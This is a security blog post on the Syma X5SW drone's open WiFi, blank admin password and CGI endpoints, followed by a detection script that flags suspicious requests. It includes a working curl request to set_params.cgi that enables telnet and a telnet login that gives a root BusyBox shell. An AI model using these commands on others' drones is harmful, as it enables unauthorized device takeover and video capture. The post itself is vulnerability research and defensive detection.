Root Shell on your Drone!

Cheap drones such as the Syma X5SW aren’t really designed with security in mind. Anyone can connect to the open WiFi access point that the drone broadcasts and issue requests to the drone’s web server for things like video streaming, setting options, and more.

Syma X5SW

This drone runs a DHCP server that assigns addresses starting at 192.168.1.100; the drone itself has the static IP 192.168.1.1. On port 80, it runs a boa 0.94.14rc21 web server. It has a statically configured admin user with a blank password. To authenticate a request, the client supplies user=admin and pwd= as GET parameters.

Android App

As a starting point, I downloaded the APK for the Android version of the FPV app. After unzipping the APK, we found the first endpoint for capturing images by running the following command on the app’s dex file:

strings com.tomdxs.symafpv/classes.dex | grep cgi

This yielded a single result: 2http://192.168.1.1:80/snapshot.cgi?user=admin&pwd=, clearly the streaming endpoint we were looking for. Googling this URL turned up much better search results and gave me access to previous research done on these [and similarly architected] drones, and on manufacturers that produce similar cameras:

Known Endpoints

  • GET /videostream.cgi - streaming video
  • GET /snapshot.cgi - take a picture
  • GET /get_params.cgi - get all camera options
  • GET /set_params.cgi - set all camera options, including activation of telnetd!

Obtaining video

We can obtain video in most modern web browsers by GET requesting the videostream page: http://192.168.1.1/videostream.cgi?user=admin&pwd=.

We can obtain still images by making a GET request here: http://192.168.1.1/snapshot.cgi?user=admin&pwd=. The images it outputs are relatively low quality. One of the samples we obtained had a size of 640x480, and was 0.307 Megapixels.

Root Shell

# To obtain a shell on the device, we run the following `GET` request:
$ curl 'http://192.168.1.1/set_params.cgi?telnetd=1&save=1&reboot=1&user=admin&pwd='

# Once it reboots, we telnet into the box with the `admin` user:
$ telnet -l admin 192.168.1.1

# If all goes successfully, after a few seconds you'll have a shell!
# BusyBox v1.15.2 (2015-07-01 14:40:28 CST) hush - the humble shell
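For anyone watching traffic on a network where one of these cameras lives, the requests above are easy to spot. The following is an added detection example, not code from the original post: it flags HTTP request lines that authenticate with the blank admin password or that use set_params.cgi to turn on telnetd. The function names, the finding labels and the request-line input format are assumptions, and the sample lines are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# CGI endpoints listed in the post for this camera firmware.
KNOWN_CGI = {"/videostream.cgi", "/snapshot.cgi", "/get_params.cgi", "/set_params.cgi"}

def classify(request_line):
    """Return findings for one HTTP request line ("GET /path?query HTTP/1.1")."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    url = urlsplit(parts[1])  # also handles absolute-form URLs seen via proxies
    path = url.path.lower()
    if path not in KNOWN_CGI:
        return []
    # keep_blank_values matters: the default credential is an *empty* pwd.
    q = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if q.get("user") == ["admin"] and q.get("pwd") == [""]:
        findings.append("blank-admin-password")
    if path == "/set_params.cgi":
        findings.append("config-change")
        if "1" in q.get("telnetd", []):
            findings.append("telnetd-enabled")
        if "1" in q.get("reboot", []):
            findings.append("reboot-requested")
    return findings

def scan(lines):
    """Map each flagged request line to its list of findings."""
    return {line: f for line in lines if (f := classify(line))}

# Constructed sample capture (not real traffic).
SAMPLE = [
    "GET /snapshot.cgi?user=admin&pwd= HTTP/1.1",
    "GET /set_params.cgi?telnetd=1&save=1&reboot=1&user=admin&pwd= HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /get_params.cgi?user=admin&pwd=s3cret HTTP/1.1",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE).items():
        print(findings, line)
```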

Drone Control

Unfortunately, unlike the microdrone mentioned in one of the other articles I read, it appears you cannot control the drone via the web interface. The serial ports that the article mentions don’t exist on this drone.

Things to do

  • There are binaries for powering off the drone, shutting down, etc. Do they work while in-flight?
  • Search for CGI scripts to possibly find other vulnerabilities

Change Log

  • 5/31/2018 - Initial Revision
